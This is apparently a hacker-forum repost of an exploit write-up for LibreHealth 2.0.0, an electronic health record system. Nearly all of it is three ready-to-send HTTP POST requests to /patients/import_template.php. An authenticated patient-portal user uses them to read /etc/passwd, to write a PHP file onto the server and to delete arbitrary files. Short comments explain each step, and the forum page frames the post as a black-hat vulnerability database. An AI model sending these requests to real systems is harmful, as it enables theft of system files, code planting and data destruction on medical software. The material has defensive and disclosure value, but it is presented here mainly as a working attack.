跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

LibreHealth 2.0.0 - (Authenticated) Arbitrary File Actions

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: LibreHealth 2.0.0 - Arbitrary File Actions 
# Date: 2018-10-19
# Exploit Author: Carlos Avila
# Vendor Homepage: https://librehealth.io/
# Software Link: https://github.com/LibreHealthIO/lh-ehr
# Version: < 2.0.0
# Tested on: Debian LAMP, LibreHealth 2.0.0

# LibreHealth is the 'fork' of the OpenEMR project. I have executed these PoCs 
# based on on Bug Reported by Joshua Fam [@Insecurity]
 
# 1.Arbitrary File Read:
# In LibreHealth a user that has access to the portal patient (authenticated) can send a 
# malicious POST request to read arbitrary files.
 
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=get&docid=/etc/passwd
 
# This attack represents a file inclusion attack (LFI)
# 2.Arbitrary File Write:
# In LibreHealth a user that has access to the portal patient (authenticated) can send 
# a malicious POST request to write arbitrary files.
  
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=save&docid=payload.php&content=<?php phpinfo();?>

# When you send the attack you can browse the website where the file was written and 
# the payload.php at http://192.168.6.200/patients/payload.php
# 3. Arbitrary File Delete:
# In LibreHealth a user that has access to the portal patient (authenticated) can send a 
# malicious POST request to delete a arbitrary file.
      
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
 
mode=delete&docid=payload.php
        
# When you make the attack you can navigate on the deleted page and you should receive 404 error (page not found)

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。